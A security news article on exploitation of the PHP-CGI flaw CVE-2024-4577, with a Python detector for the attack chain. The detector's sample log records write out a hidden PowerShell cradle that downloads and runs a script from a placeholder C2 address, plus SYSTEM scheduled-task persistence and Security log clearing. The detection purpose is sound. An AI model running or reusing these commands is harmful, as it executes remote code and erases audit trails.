A new cyber-security threat has emerged in which unknown attackers are exploiting a critical remote code execution (RCE) vulnerability in PHP-CGI on Windows systems.
The vulnerability, tracked as CVE-2024-4577, allows attackers to execute arbitrary PHP code on servers running Apache with a vulnerable PHP-CGI configuration.
The attackers are primarily targeting organizations in Japan across various sectors, including technology, telecommunications, entertainment, education, and e-commerce.
Exploitation and Post-Exploitation Activities
The attackers gain initial access by leveraging a publicly available Python exploit script that checks for the CVE-2024-4577 vulnerability.
Once the vulnerability is exploited, they execute a PowerShell command embedded in PHP code, which downloads and runs a PowerShell injector script from a command and control (C2) server.
According to the Cisco Talos report, this script injects and executes Cobalt Strike reverse HTTP shellcode, giving the attackers remote access to the victim machine.
The attackers then use plugins from the Cobalt Strike "TaoWu" kit for post-exploitation activities, including reconnaissance, privilege escalation, and persistence.
They employ tools such as JuicyPotato, RottenPotato, and SweetPotato for privilege escalation, and they modify registry keys and create scheduled tasks to maintain persistence.
The attackers also conduct network reconnaissance with tools such as "fscan.exe" and "Seatbelt.exe" to map potential targets for lateral movement.
They attempt to abuse Group Policy Objects (GPOs) to execute malicious scripts across the network.
Additionally, they use Mimikatz to dump and exfiltrate passwords and NTLM hashes from memory.
To evade detection, they clear Windows event logs using "wevtutil.exe". Clearing the Security log itself still leaves an Event ID 1102 ("The audit log was cleared") record behind, which makes that event a reliable detection point for this step.
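The chain above (php-cgi.exe spawning PowerShell, a download cradle pulling the injector, schtasks-based persistence, and wevtutil log clearing) is visible almost entirely in process-creation telemetry. The following is an added detection example, not code from the Talos report or from this article. It assumes a constructed, tab-separated record format (timestamp, parent image, image, command line) that stands in for Sysmon Event ID 1 or Security Event ID 4688 fields; the sample records, the C2 address 198.51.100.10 and the file names in them are all made up for the example.

```python
"""Flag process-creation records matching the PHP-CGI -> PowerShell -> persistence -> log-clearing chain.

Added example; the record format and sample data are constructed, not Talos telemetry.
"""
import re
from pathlib import PureWindowsPath
from typing import Iterator

# Constructed sample records: timestamp, parent image, image, command line.
SAMPLE_RECORDS = [
    ("2025-03-05T09:12:01Z", r"C:\Apache24\bin\httpd.exe", r"C:\php\php-cgi.exe", "php-cgi.exe"),
    ("2025-03-05T09:12:02Z", r"C:\php\php-cgi.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('http://198.51.100.10/inject.ps1')\""),   # constructed C2 address
    ("2025-03-05T09:14:30Z", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\schtasks.exe",
     r"schtasks /create /sc minute /mo 5 /tn Updater /tr C:\Users\Public\run.bat /ru SYSTEM"),
    ("2025-03-05T09:20:11Z", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wevtutil.exe",
     "wevtutil cl Security"),
    ("2025-03-05T09:20:12Z", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wevtutil.exe",
     "wevtutil qe Application /c:5"),   # benign query, must not be flagged
    ("2025-03-05T09:25:00Z", r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
     "notepad.exe"),
]
SAMPLE_LOG = "\n".join("\t".join(r) for r in SAMPLE_RECORDS)

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Tool names from the article. An attacker can rename a binary, so this is a low-confidence rule.
KNOWN_TOOL_NAMES = {"juicypotato.exe", "rottenpotato.exe", "sweetpotato.exe",
                    "mimikatz.exe", "fscan.exe", "seatbelt.exe"}
DOWNLOAD_CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b", re.I)
WEVTUTIL_CLEAR = re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.I)
SCHTASKS_CREATE = re.compile(r"\bschtasks(\.exe)?\s+/create\b", re.I)


def parse(log_text: str) -> Iterator[tuple[str, str, str, str]]:
    """Yield (timestamp, parent_name, image_name, command_line); malformed lines are skipped."""
    for line in log_text.splitlines():
        parts = line.split("\t")
        if len(parts) != 4:
            continue
        ts, parent, image, cmdline = parts
        # PureWindowsPath handles backslash paths even when this runs on Linux.
        yield ts, PureWindowsPath(parent).name.lower(), PureWindowsPath(image).name.lower(), cmdline


def classify(parent: str, image: str, cmdline: str) -> list[str]:
    """Return every rule name a single record matches (names are lower-cased basenames)."""
    hits = []
    if parent == "php-cgi.exe" and image in SHELLS:
        hits.append("php-cgi spawned shell")        # a CGI worker has no business launching a shell
    if image in SHELLS and DOWNLOAD_CRADLE.search(cmdline):
        hits.append("download cradle")
    if WEVTUTIL_CLEAR.search(cmdline):
        hits.append("event log cleared")
    if SCHTASKS_CREATE.search(cmdline):
        hits.append("scheduled task created")
    if image in KNOWN_TOOL_NAMES:
        hits.append(f"known tool name: {image}")
    return hits


def detect(log_text: str) -> list[tuple[str, str, str]]:
    """Run every rule over every record; returns (timestamp, rule, command_line) per hit."""
    findings = []
    for ts, parent, image, cmdline in parse(log_text):
        for rule in classify(parent, image, cmdline):
            findings.append((ts, rule, cmdline))
    return findings


if __name__ == "__main__":
    for ts, rule, cmdline in detect(SAMPLE_LOG):
        print(f"{ts}  {rule:24}  {cmdline[:72]}")
```

The parent/child rule is the strongest signal here: it does not depend on the attacker's file names or on the exact cradle syntax, only on the fact that php-cgi.exe should never have a shell as a child. The tool-name rule is kept deliberately separate so it can be weighted lower in a real pipeline.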
Misuse of Legitimate Tools and Frameworks
The attackers have also been observed misusing legitimate tools and frameworks hosted on an Alibaba Cloud container registry.
They use a pre-configured installer script to deploy a set of adversarial tools, including Vulfocus, Asset Reconnaissance Lighthouse (ARL), Viper C2, Starkiller, BeEF, and Blue-Lotus.
These tools are normally used for offensive security testing but are being repurposed for malicious activity.
The attackers' tactics show similarities with those of known threat groups, though attribution remains uncertain.
The ongoing exploitation of public-facing applications for initial access highlights the importance of prompt patching and of robust security controls around internet-exposed services.
Organizations should prioritize patching and securing their PHP-CGI deployments and monitoring for suspicious activity, in particular any child process spawned by php-cgi.exe, to mitigate these threats.